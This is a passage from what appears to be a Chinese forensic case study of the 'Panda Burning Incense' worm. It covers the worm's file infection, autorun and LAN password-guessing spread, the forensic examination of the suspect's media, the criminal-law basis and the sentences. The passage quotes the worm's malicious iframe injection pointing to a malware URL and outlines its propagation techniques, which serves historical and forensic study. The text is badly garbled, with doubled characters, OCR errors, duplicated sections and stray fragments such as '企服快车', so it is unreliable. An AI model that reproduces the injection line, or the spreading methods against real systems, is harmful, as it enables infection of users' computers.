浏览量非常大,导致熊猫烧香病毒的感染范围非常广,中毒企业和政府机构不计其数,其中不乏金融、税务、能能源等关系到国计民生的重要单位。

1.本地磁盘感染

(1)感感染对象:病病毒对系统中所有(除了盘符为A、B的磁盘)类型为为 DRIVEEMOTE, DRIVE FIXED的磁盘进行文件遍历感染(不感染大小超过10485760字节以上的文件)。

(2)感染方式:病毒使用两类感染方式应对不同后缀的文件名进行感染。

二进制可执行文件(后级名为.eXe、。

SCIr、,pif、.com):将感染目标文件和病毒溶合成个文件(被感染文件贴在病毒文件尾部)完成感染脚本类(后缀名为.htm、.html、.aSp、.php、?JSP、.aspx):在这些脚本文件尾加上如下链接(下面的页面存在安全漏洞),iframesrc=http:

//www.krvkr.com/worm.htnwidth= height=0></ iframe>在感染时会删除这些磁盘上的后缀名为.gho的文件。

2.生成 autorun.inf病毒建立一个计时器,以以0.6秒为周期在磁盘的根目录下,生成 setup.exe(病毒本身)autorun.inf并利用用 Autorun Open关联使病毒在用户单击被感染磁盘时能被自动运行。

3.局域网传播

病毒生成随机各局域网传播线程,实现如下的传播方式:当病毒发现能成功连接攻击目标的139或445端口后,将使用内置的一个用户列表及密码字典进行连接(猜测被攻击端的密码)。

当成功连接以后,将自己复制并利用计划任务启动激活病毒;修改操作系统的启

动关联;下载文件启动;与杀毒软件对抗。

【案件分析】

1鉴定要求

2007年2月6号,对主要犯罪嫌疑人李某出租屋中收集的检材,某市公安局网监大队委托××××司法鉴定所进行司法鉴定。

(1)鉴定检材中是否存在制作传播病毒的证据。

(2)鉴定病毒编写的相关时间信息及病毒制作方式。

(3)提取病毒样本及与案件相关的其他证据。

2鉴定环境

(1)硬件:取证用台式计算机( dell-dimension5150)、高速硬盘复制机、四合一只读

读卡器、取证硬盘、各类接口转换卡、数据线、移动硬盘、U盘。

(2)软件: Microsoft Windows Server2003 Enterprise Edition、 Encase5.04b、 Ultraedit-32。

3材克隆和MD5值值校验

使用硬盘复制机将原始硬盘数据克隆至无任何数据的取证硬盘,克隆后的取证硬盘与取证计算机连接,其他介质通过只读读卡器与计算机连接。

连接后通过 Encase软件进行初步分析,如果数据已被删除,则利用数据恢复工具进行恢复,对全部嫌疑数据进行分析统计并形成鉴定报告证据文件固定后进行MD5值校验。

整个操作流程对原始存储媒介中保存的原始信息不会造成任何影响

(3)提取病毒样本及与案件相关的其他证据。

4鉴定环境

(1)硬件:取证用台式计算机( dell-dimension5150)、高速硬盘复制机、四合一只读

读卡器、取证硬盘、各类接口转换卡、数据线、移动硬盘、U盘。

(2)软件: Microsoft Windows Server2003 Enterprise Edition、 Encase5.04b、 Ultraedit-32。

5材克隆和MD5值值校验

使用硬盘复制机将原始硬盘数据克隆至无任何数据的取证硬盘,克隆后的取证硬盘与取证计算机连接,其他介质通过只读读卡器与计算机连接。

连接后通过 Encase软件进行初步分析,如果数据已被删除,则利用数据恢复工具进行恢复,对全部嫌疑数据进行分析统计并形成鉴定报告证据文件固定后进行MD5值校验。

整个操作流程对原始存储媒介中保存的原始信息不会造成任何影响

6定结论

综合以上信息进行分析可以认定:李某使用的存储介质中存在制作传播木马病毒的证

据。

其证据罗列如下。

(1)制作和传播木马病毒的实验环境。

(2)编编写病毒代码的软件工具。

(3)所编写的多个病毒源代码及由该代码所生成的可执行文件。

(4)通过该木马软件直接或间接获得他人计算机内的游戏戏账号和登录口令等信息

(5)所出售木马病毒代码和木马生成器的价格。

(6)关技术资料时留下的收藏网址和多次访问病毒源码时留下的历史记录。

(7)木马病毒编写的大致时间从“蓝天使移动硬盘”上反映的信息来看,应该是在2006年

10月16日或之前更早的时间,在2006年10月16日之后曾经多次对其进行了修改和升

级。

其制作方式从多个代码的内容来看,应该是使用的“类C语言”、“ Delphi”、“汇编”和DOS中的“bat”语法,不排除其整合其他多个病毒代码(如威金病毒代码等)自己加工成新木马病毒的可能。

整个鉴定报告是按照《刑法》第二百八十六条的相关内容“违反国家规定,对计算机信息

系统功能进行删除、修改、增加、干扰,造成计算机信息系统不能正常运行,后果严重的,处五年以下有期徒刑或者拘役;后果特别严重的,处五年以上有期徒刑。

违反国家规定,对计算机信息系统中存储、处理或者传输的数据和应用程序进行删除、修改、增加的操作,后果严重的,依照前款的规定处罚。

故意制作、传播计算机病毒等破坏性程序,影响计算机系统正常运行,后果严重重的,依照第一款的规定处罚。”来制作的,主要从“故意制作”和“故意传播和非法盈利”来来寻找和提供证据

【法院判决】

熊猫烧香是我国近年来最为严重的计算机蠕虫病毒事件,在互联网上引起巨大震荡,受广大的民众、媒体和IT公司人士关注,因此,审理此案的某人民法院出现该院有史以来刑事审判旁听爆满的情况。

最后,经过司法审判,整个鉴定报告得到了法庭的采信,“熊熊猫烧香”案的相关案案犯一一获刑,法院以破坏计算算机信息系统罪判处李某有期徒刑4年、王某有期徒刑2年6个月、张某有期徒刑2年、雷某有期徒刑一年,并判决李某、王某、张某的违法所得予以追缴,上缴国库。

【思考】

从“熊猫烧香”的研究可以看到:企服快车面,“熊猫烧香”案审判表明我国司法鉴定理论与实务,在惩治计算机犯罪方面前进了一大步,给以后的计算机案件处理提供了借鉴;另企服快车

面,“熊猫烧香”案中出现的一系列计算机技术问题及法律的应用,给学界和司法实务部门提出了新的挑战,促使我国惩治计算机犯罪相关法律的完善以及计算机司法鉴定技术的进一

步成熟。

ycz company